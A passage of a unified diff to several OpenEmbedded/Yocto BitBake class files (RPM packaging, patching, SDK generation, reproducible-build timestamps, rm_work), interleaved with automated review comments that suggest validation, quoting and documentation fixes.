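--- a/meta/classes/package_pkgdata.bbclass
+++ b/meta/classes/package_pkgdata.bbclass
@@ -162,6 +162,6 @@ python package_prepare_pkgdata() {
 
 }
 package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}"
-package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA"
+package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA SSTATETASKS"
 
 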
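--- a/meta/classes/package_rpm.bbclass
+++ b/meta/classes/package_rpm.bbclass
@@ -678,11 +678,12 @@ python do_package_rpm () {
  cmd = cmd + " --define '_use_internal_dependency_generator 0'"
  cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'"
  cmd = cmd + " --define '_build_id_links none'"
- cmd = cmd + " --define '_binary_payload w6T.xzdio'"
- cmd = cmd + " --define '_source_payload w6T.xzdio'"
+ cmd = cmd + " --define '_binary_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
+ cmd = cmd + " --define '_source_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
  cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'"
  cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'"
  cmd = cmd + " --define '_buildhost reproducible'"
+ cmd = cmd + " --define '__font_provides %{nil}'"
  if perfiledeps:
  cmd = cmd + " --define '__find_requires " + outdepends + "'"
  cmd = cmd + " --define '__find_provides " + outprovides + "'"
@@ -742,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}"
 do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}"
 do_package_write_rpm[umask] = "022"
 do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_rpm after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK}
 
 PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot"
 PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot"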
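Review bot: The two payload defines in do_package_rpm call `int(d.getVar("XZ_THREADS"))` directly, so an unset or non-numeric XZ_THREADS ends the task with a bare TypeError or ValueError instead of a message naming the variable. XZ_THREADS is not defined in this hunk; it presumably comes from global configuration, but a distro or local.conf override can still give it a value int() rejects. I would read it once before the defines, e.g. `xz_threads = d.getVar("XZ_THREADS") or ""` followed by `if not xz_threads.isdigit(): bb.fatal("XZ_THREADS must be an integer, got '%s'" % xz_threads)`, and format both defines from `int(xz_threads)`. The body of do_package_rpm starts and ends outside the hunk.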
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index 25ec089ae1..484d27ac76 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
131 patchdir = parm["patchdir"] 131 patchdir = parm["patchdir"]
132 if not os.path.isabs(patchdir): 132 if not os.path.isabs(patchdir):
133 patchdir = os.path.join(s, patchdir) 133 patchdir = os.path.join(s, patchdir)
134 if not os.path.isdir(patchdir):
135 bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
136 (patchdir, parm["patchdir"], parm['patchname']))
134 else: 137 else:
135 patchdir = s 138 patchdir = s
136 139
@@ -147,12 +150,12 @@ python patch_do_patch() {
147 patchset.Import({"file":local, "strippath": parm['striplevel']}, True) 150 patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
148 except Exception as exc: 151 except Exception as exc:
149 bb.utils.remove(process_tmpdir, True) 152 bb.utils.remove(process_tmpdir, True)
150 bb.fatal(str(exc)) 153 bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
151 try: 154 try:
152 resolver.Resolve() 155 resolver.Resolve()
153 except bb.BBHandledException as e: 156 except bb.BBHandledException as e:
154 bb.utils.remove(process_tmpdir, True) 157 bb.utils.remove(process_tmpdir, True)
155 bb.fatal(str(e)) 158 bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
156 159
157 bb.utils.remove(process_tmpdir, True) 160 bb.utils.remove(process_tmpdir, True)
158 del os.environ['TMPDIR'] 161 del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index dea272c441..49fdfaa93d 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -51,6 +51,8 @@ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
51SDK_ARCHIVE_TYPE ?= "tar.xz" 51SDK_ARCHIVE_TYPE ?= "tar.xz"
52SDK_XZ_COMPRESSION_LEVEL ?= "-9" 52SDK_XZ_COMPRESSION_LEVEL ?= "-9"
53SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}" 53SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}"
54SDK_ZIP_OPTIONS ?= "-y"
55
54 56
55# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz 57# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz
56python () { 58python () {
@@ -58,7 +60,7 @@ python () {
58 d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native') 60 d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native')
59 # SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR} 61 # SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR}
60 # recommand to cd into input dir first to avoid archive with buildpath 62 # recommand to cd into input dir first to avoid archive with buildpath
61 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r -y ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .') 63 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r ${SDK_ZIP_OPTIONS} ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
62 else: 64 else:
63 d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native') 65 d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native')
64 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}') 66 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}')
@@ -66,7 +68,7 @@ python () {
66 68
67SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}" 69SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
68SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross" 70SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
69PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:" 71PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
70SDK_DEPENDS += "nativesdk-glibc-locale" 72SDK_DEPENDS += "nativesdk-glibc-locale"
71 73
72# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it 74# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -178,7 +180,7 @@ do_populate_sdk[sstate-inputdirs] = "${SDKDEPLOYDIR}"
178do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}" 180do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}"
179do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}" 181do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}"
180 182
181PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR}" 183PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR},${WORKDIR}/oe-sdk-repo,${WORKDIR}/sstate-build-populate_sdk"
182 184
183fakeroot create_sdk_files() { 185fakeroot create_sdk_files() {
184 cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/ 186 cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/
@@ -275,6 +277,7 @@ EOF
275 # substitute variables 277 # substitute variables
276 sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \ 278 sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
277 -e 's#@SDKPATH@#${SDKPATH}#g' \ 279 -e 's#@SDKPATH@#${SDKPATH}#g' \
280 -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
278 -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \ 281 -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
279 -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \ 282 -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
280 -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \ 283 -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
@@ -324,6 +327,13 @@ def sdk_variables(d):
324 327
325do_populate_sdk[vardeps] += "${@sdk_variables(d)}" 328do_populate_sdk[vardeps] += "${@sdk_variables(d)}"
326 329
330python () {
331 variables = sdk_command_variables(d)
332 for var in variables:
333 if d.getVar(var, False):
334 d.setVarFlag(var, 'func', '1')
335}
336
327do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \ 337do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \
328 ${TOOLCHAIN_SHAR_EXT_TMPL}:True" 338 ${TOOLCHAIN_SHAR_EXT_TMPL}:True"
329 339
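Review bot: `SDK_ZIP_OPTIONS ?= "-y"` turns the previously hard-coded `-y` of the zip command into something a distro or local.conf can drop, and nothing next to the new variable says why the flag is there. `-y` makes zip store symbolic links as links; without it zip follows them and archives the files they point to, which for absolute links inside the SDK output could pull files from the build host into the shipped archive. I would document that above the default, e.g. `# -y stores symlinks as links; keep it when overriding, otherwise zip follows links and archives their targets`.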
diff --git a/meta/classes/populate_sdk_ext.bbclass b/meta/classes/populate_sdk_ext.bbclass
index 71686bc993..1bdfd92847 100644
--- a/meta/classes/populate_sdk_ext.bbclass
+++ b/meta/classes/populate_sdk_ext.bbclass
@@ -117,7 +117,7 @@ python write_host_sdk_ext_manifest () {
117 f.write("%s %s %s\n" % (info[1], info[2], info[3])) 117 f.write("%s %s %s\n" % (info[1], info[2], info[3]))
118} 118}
119 119
120SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = "write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; " 120SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = " write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
121 121
122SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK" 122SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK"
123 123
@@ -247,7 +247,9 @@ python copy_buildsystem () {
247 247
248 # Create a layer for new recipes / appends 248 # Create a layer for new recipes / appends
249 bbpath = d.getVar('BBPATH') 249 bbpath = d.getVar('BBPATH')
250 bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')]) 250 env = os.environ.copy()
251 env['PYTHONDONTWRITEBYTECODE'] = '1'
252 bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')], env=env)
251 253
252 # Create bblayers.conf 254 # Create bblayers.conf
253 bb.utils.mkdirhier(baseoutpath + '/conf') 255 bb.utils.mkdirhier(baseoutpath + '/conf')
@@ -360,6 +362,10 @@ python copy_buildsystem () {
360 # Hide the config information from bitbake output (since it's fixed within the SDK) 362 # Hide the config information from bitbake output (since it's fixed within the SDK)
361 f.write('BUILDCFG_HEADER = ""\n\n') 363 f.write('BUILDCFG_HEADER = ""\n\n')
362 364
365 # Write METADATA_REVISION
366 # Needs distro override so it can override the value set in the bbclass code (later than local.conf)
367 f.write('METADATA_REVISION:%s = "%s"\n\n' % (d.getVar('DISTRO'), d.getVar('METADATA_REVISION')))
368
363 f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n') 369 f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n')
364 f.write('WITHIN_EXT_SDK = "1"\n\n') 370 f.write('WITHIN_EXT_SDK = "1"\n\n')
365 371
@@ -664,7 +670,7 @@ sdk_ext_postinst() {
664 670
665 # A bit of another hack, but we need this in the path only for devtool 671 # A bit of another hack, but we need this in the path only for devtool
666 # so put it at the end of $PATH. 672 # so put it at the end of $PATH.
667 echo "export PATH=$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH" >> $env_setup_script 673 echo "export PATH=\"$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH\"" >> $env_setup_script
668 674
669 echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script 675 echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script
670 676
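Review bot: The quoting added to the `export PATH=` line in sdk_ext_postinst protects only the value written into the environment script; the redirection target `>> $env_setup_script` on that line, and on the `printf` line after it, is still unquoted. If the change is meant to support install paths containing spaces, and `$env_setup_script` is located under `$target_sdk_dir` (its assignment is not visible in this hunk), the append can fail or go to an unintended file in shells that split or reject such a target. I would quote it on both lines, e.g. `... >> "$env_setup_script"`. sdk_ext_postinst starts and ends outside the hunk.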
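--- a/meta/classes/pypi.bbclass
+++ b/meta/classes/pypi.bbclass
@@ -24,3 +24,5 @@ S = "${WORKDIR}/${PYPI_PACKAGE}-${PV}"
 
 UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/"
 UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/"
+
+CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"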
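Review bot: The new default `CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"` can make CVE scanning silently miss issues, because it assumes every PyPI package is tracked under a `python` vendor entry with a product name equal to PYPI_PACKAGE. Assuming the CVE check treats the part before the colon as the vendor, a package recorded under its own project's vendor name, or under a product name that differs from the PyPI name, would match nothing and be reported as clean. I would add a comment above the line telling recipe authors to verify and override, e.g. `# Default guess only: check the CVE database vendor:product for this package and set CVE_PRODUCT in the recipe if it differs`.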
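--- a/meta/classes/python3targetconfig.bbclass
+++ b/meta/classes/python3targetconfig.bbclass
@@ -15,3 +15,15 @@ do_compile_prepend_class-target() {
 do_install_prepend_class-target() {
  export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
 }
+
+do_configure:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}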
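Review bot: The three new nativesdk functions are named with the colon override form (`do_configure:prepend:class-nativesdk`) while the existing functions directly above them use the underscore form (`do_install_prepend_class-target`). Mixing both spellings in one class is hard to read, and if the BitBake on this branch does not treat the colon form as an override these prepends would not run and `_PYTHON_SYSCONFIGDATA_NAME` would stay unset for nativesdk builds; that should be confirmed. For consistency I would name them like their neighbours, e.g. `do_configure_prepend_class-nativesdk() {`, and likewise for do_compile and do_install.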
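--- a/meta/classes/qemuboot.bbclass
+++ b/meta/classes/qemuboot.bbclass
@@ -7,6 +7,7 @@
 # QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor"
 #
 # QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage"
+# e.g., "bzImage-initramfs-qemux86-64.bin" if INITRAMFS_IMAGE_BUNDLE is set to 1.
 #
 # QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4"
 #
@@ -75,7 +76,7 @@
 
 QB_MEM ?= "-m 256"
 QB_SERIAL_OPT ?= "-serial mon:stdio -serial null"
-QB_DEFAULT_KERNEL ?= "${KERNEL_IMAGETYPE}"
+QB_DEFAULT_KERNEL ?= "${@bb.utils.contains("INITRAMFS_IMAGE_BUNDLE", "1", "${KERNEL_IMAGETYPE}-${INITRAMFS_LINK_NAME}.bin", "${KERNEL_IMAGETYPE}", d)}"
 QB_DEFAULT_FSTYPE ?= "ext4"
 QB_OPT_APPEND ?= "-show-cursor"
 QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@"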
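--- a/meta/classes/report-error.bbclass
+++ b/meta/classes/report-error.bbclass
@@ -64,6 +64,8 @@ python errorreport_handler () {
  data['failures'] = []
  data['component'] = " ".join(e.getPkgs())
  data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data))
+ data['bitbake_version'] = e.data.getVar("BB_VERSION")
+ data['layer_version'] = get_layers_branch_rev(e.data)
  data['local_conf'] = get_conf_data(e, 'local.conf')
  data['auto_conf'] = get_conf_data(e, 'auto.conf')
  lock = bb.utils.lockfile(datafile + '.lock')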
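Review bot: `data['layer_version'] = get_layers_branch_rev(e.data)` adds the configured layers with their branches and revisions to the error report, next to the `local_conf` and `auto_conf` contents already collected, and nothing in the hunk tells the reader that this is now part of the report. If these reports are later uploaded to a shared error-report server, the names and revisions of private layers would leave the build host with them. get_layers_branch_rev is defined outside this hunk, so its exact output is inferred from the name. I would add a comment before the two new assignments, e.g. `# Included in the report file: BitBake version and per-layer branch/revision (may name private layers)`.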
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 2f3bd90b07..3c01dbd5b3 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -1,17 +1,38 @@
1# reproducible_build.bbclass 1# reproducible_build.bbclass
2# 2#
3# Sets SOURCE_DATE_EPOCH in each component's build environment. 3# Sets the default SOURCE_DATE_EPOCH in each component's build environment.
4# The format is number of seconds since the system epoch.
5#
4# Upstream components (generally) respect this environment variable, 6# Upstream components (generally) respect this environment variable,
5# using it in place of the "current" date and time. 7# using it in place of the "current" date and time.
6# See https://reproducible-builds.org/specs/source-date-epoch/ 8# See https://reproducible-builds.org/specs/source-date-epoch/
7# 9#
8# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH. 10# The default value of SOURCE_DATE_EPOCH comes from the function
9# This value should be reproducible for anyone who builds the same revision from the same sources. 11# get_source_date_epoch_value which reads from the SDE_FILE, or if the file
12# is not available (or set to 0) will use the fallback of
13# SOURCE_DATE_EPOCH_FALLBACK.
14#
15# The SDE_FILE is normally constructed from the function
16# create_source_date_epoch_stamp which is typically added as a postfuncs to
17# the do_unpack task. If a recipe does NOT have do_unpack, it should be added
18# to a task that runs after the source is available and before the
19# do_deploy_source_date_epoch task is executed.
20#
21# If a recipe wishes to override the default behavior it should set it's own
22# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task
23# with recipe-specific functionality to write the appropriate
24# SOURCE_DATE_EPOCH into the SDE_FILE.
25#
26# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should
27# be reproducible for anyone who builds the same revision from the same
28# sources.
10# 29#
11# There are 4 ways we determine SOURCE_DATE_EPOCH: 30# There are 4 ways the create_source_date_epoch_stamp function determines what
31# becomes SOURCE_DATE_EPOCH:
12# 32#
13# 1. Use the value from __source_date_epoch.txt file if this file exists. 33# 1. Use the value from __source_date_epoch.txt file if this file exists.
14# This file was most likely created in the previous build by one of the following methods 2,3,4. 34# This file was most likely created in the previous build by one of the
35# following methods 2,3,4.
15# Alternatively, it can be provided by a recipe via SRC_URI. 36# Alternatively, it can be provided by a recipe via SRC_URI.
16# 37#
17# If the file does not exist: 38# If the file does not exist:
@@ -22,25 +43,24 @@
22# 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ... 43# 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ...
23# This works for well-kept repositories distributed via tarball. 44# This works for well-kept repositories distributed via tarball.
24# 45#
25# 4. Use the modification time of the youngest file in the source tree, if there is one. 46# 4. Use the modification time of the youngest file in the source tree, if
47# there is one.
26# This will be the newest file from the distribution tarball, if any. 48# This will be the newest file from the distribution tarball, if any.
27# 49#
28# 5. Fall back to a fixed timestamp. 50# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK).
29# 51#
30# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE. 52# Once the value is determined, it is stored in the recipe's SDE_FILE.
31# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task
32# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE.
33#
34# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable.
35# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...)
36 53
37BUILD_REPRODUCIBLE_BINARIES ??= '1' 54BUILD_REPRODUCIBLE_BINARIES ??= '1'
38inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')} 55inherit reproducible_build_simple
39 56
40SDE_DIR ="${WORKDIR}/source-date-epoch" 57SDE_DIR = "${WORKDIR}/source-date-epoch"
41SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt" 58SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt"
42SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch" 59SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch"
43 60
61# A SOURCE_DATE_EPOCH of '0' might be misinterpreted as no SDE
62export SOURCE_DATE_EPOCH_FALLBACK ??= "1302044400"
63
44SSTATETASKS += "do_deploy_source_date_epoch" 64SSTATETASKS += "do_deploy_source_date_epoch"
45 65
46do_deploy_source_date_epoch () { 66do_deploy_source_date_epoch () {
@@ -74,45 +94,47 @@ python create_source_date_epoch_stamp() {
74 import oe.reproducible 94 import oe.reproducible
75 95
76 epochfile = d.getVar('SDE_FILE') 96 epochfile = d.getVar('SDE_FILE')
77 # If it exists we need to regenerate as the sources may have changed 97 tmp_file = "%s.new" % epochfile
78 if os.path.isfile(epochfile):
79 bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile)
80 os.remove(epochfile)
81 98
82 source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S')) 99 source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S'))
83 100
84 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) 101 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
85 bb.utils.mkdirhier(d.getVar('SDE_DIR')) 102 bb.utils.mkdirhier(d.getVar('SDE_DIR'))
86 with open(epochfile, 'w') as f: 103 with open(tmp_file, 'w') as f:
87 f.write(str(source_date_epoch)) 104 f.write(str(source_date_epoch))
105
106 os.rename(tmp_file, epochfile)
88} 107}
89 108
109EPOCHTASK = "do_deploy_source_date_epoch"
110
111# Generate the stamp after do_unpack runs
112do_unpack[postfuncs] += "create_source_date_epoch_stamp"
113
90def get_source_date_epoch_value(d): 114def get_source_date_epoch_value(d):
91 cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH') 115 epochfile = d.getVar('SDE_FILE')
92 if cached: 116 cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
117 if cached and efile == epochfile:
93 return cached 118 return cached
94 119
95 epochfile = d.getVar('SDE_FILE') 120 if cached and epochfile != efile:
96 source_date_epoch = 0 121 bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
97 if os.path.isfile(epochfile): 122
123 source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
124 try:
98 with open(epochfile, 'r') as f: 125 with open(epochfile, 'r') as f:
99 s = f.read() 126 s = f.read()
100 try: 127 try:
101 source_date_epoch = int(s) 128 source_date_epoch = int(s)
102 except ValueError: 129 except ValueError:
103 bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to 0" % s) 130 bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s)
104 source_date_epoch = 0 131 source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
105 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) 132 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
106 else: 133 except FileNotFoundError:
107 bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch)) 134 bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
108 135
109 d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch)) 136 d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
110 return str(source_date_epoch) 137 return str(source_date_epoch)
111 138
112export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}" 139export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
113BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH" 140BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH"
114
115python () {
116 if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1':
117 d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp")
118}
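Review bot: The rewritten header comment says the fallback is used when the SDE_FILE is not available "(or set to 0)", but the new get_source_date_epoch_value keeps whatever integer it reads, so a file containing `0` still yields SOURCE_DATE_EPOCH=0. The comment next to `SOURCE_DATE_EPOCH_FALLBACK` explains that 0 might be misinterpreted as no SDE, so a stamp file that holds 0 for any reason brings that case back. Unless oe.reproducible.get_source_date_epoch (not shown here) guarantees that 0 is never written, I would add directly after `source_date_epoch = int(s)` the check `if source_date_epoch == 0: source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))`, or else drop the "(or set to 0)" wording from the header.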
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78..24051aa378 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -27,6 +27,13 @@ BB_SCHEDULER ?= "completion"
27BB_TASK_IONICE_LEVEL_task-rm_work = "3.0" 27BB_TASK_IONICE_LEVEL_task-rm_work = "3.0"
28 28
29do_rm_work () { 29do_rm_work () {
30 # Force using the HOSTTOOLS 'rm' - otherwise the SYSROOT_NATIVE 'rm' can be selected depending on PATH
31 # Avoids race-condition accessing 'rm' when deleting WORKDIR folders at the end of this function
32 RM_BIN="$(PATH=${HOSTTOOLS_DIR} command -v rm)"
33 if [ -z "${RM_BIN}" ]; then
34 bbfatal "Binary 'rm' not found in HOSTTOOLS_DIR, cannot remove WORKDIR data."
35 fi
36
30 # If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe. 37 # If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe.
31 for p in ${RM_WORK_EXCLUDE}; do 38 for p in ${RM_WORK_EXCLUDE}; do
32 if [ "$p" = "${PN}" ]; then 39 if [ "$p" = "${PN}" ]; then
@@ -73,7 +80,7 @@ do_rm_work () {
73 # sstate version since otherwise we'd need to leave 'plaindirs' around 80 # sstate version since otherwise we'd need to leave 'plaindirs' around
74 # such as 'packages' and 'packages-split' and these can be large. No end 81 # such as 'packages' and 'packages-split' and these can be large. No end
